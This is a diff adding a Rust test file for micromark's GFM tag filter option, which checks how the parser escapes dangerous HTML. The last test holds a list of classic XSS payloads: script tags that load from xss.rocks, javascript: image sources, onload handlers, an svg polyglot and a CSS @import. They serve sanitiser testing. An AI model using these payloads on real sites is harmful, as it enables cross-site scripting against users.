diff options
Diffstat (limited to 'tests')
| -rw-r--r-- | tests/gfm_tagfilter.rs | 121 |
1 files changed, 121 insertions, 0 deletions
diff --git a/tests/gfm_tagfilter.rs b/tests/gfm_tagfilter.rs new file mode 100644 index 0000000..54c56ae --- /dev/null +++ b/tests/gfm_tagfilter.rs @@ -0,0 +1,121 @@ +extern crate micromark; +use micromark::{micromark_with_options, Options}; +use pretty_assertions::assert_eq; + +#[test] +fn gfm_tagfilter() { + assert_eq!( + micromark_with_options( + "<iframe>", + &Options { + allow_dangerous_html: true, + ..Options::default() + } + ), + "<iframe>", + "should not filter by default" + ); + + assert_eq!( + micromark_with_options( + "a <i>\n<script>", + &Options { + gfm_tagfilter: true, + ..Options::default() + } + ), + "<p>a <i></p>\n<script>", + "should not turn `allow_dangerous_html` on" + ); + + assert_eq!( + micromark_with_options( + "<iframe>", + &Options { + gfm_tagfilter: true, + allow_dangerous_html: true, + ..Options::default() + } + ), + "<iframe>", + "should filter" + ); + + assert_eq!( + micromark_with_options( + r###" +<title> + +<div title="<title>"></div> + +<span title="<title>"></span> + +<div><title></title></div> + +<span><title></title></span> + +<b><textarea></textarea></b> + +<script/src="#"> + +<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> + +<IMG SRC="javascript:alert('XSS');"> + +<IMG SRC=javascript:alert('XSS')> + +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> + +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\> + +<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT> + +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> + +<<SCRIPT>alert("XSS");//\<</SCRIPT> + +<SCRIPT SRC=http://xss.rocks/xss.js?< B > + +<SCRIPT SRC=//xss.rocks/.j> + +</TITLE><SCRIPT>alert("XSS");</SCRIPT> + +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> + +javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> + +<STYLE>@import'http://xss.rocks/xss.css';</STYLE> +"###, + &Options { + gfm_tagfilter: true, + allow_dangerous_html: true, + ..Options::default() + } + ), + r###"<title> +<div title="<title>"></div> +<p><span title="<title>"></span></p> +<div><title></title></div> +<p><span><title></title></span></p> +<p><b><textarea></textarea></b></p> +<p><script/src="#"></p> +<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<p><IMG SRC=javascript:alert('XSS')></p> +<p><IMG SRC=<code>javascript:alert("RSnake says, 'XSS'")</code>></p> +<p><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></p> +<p><SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT></p> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<p><<SCRIPT>alert("XSS");//<</SCRIPT></p> +<SCRIPT SRC=http://xss.rocks/xss.js?< B > + +<SCRIPT SRC=//xss.rocks/.j> + +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<p>javascript:/<em>--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[</em>/[]/+alert(1)//'></p> +<STYLE>@import'http://xss.rocks/xss.css';</STYLE> +"###, + "should handle things like GitHub" + ); +} |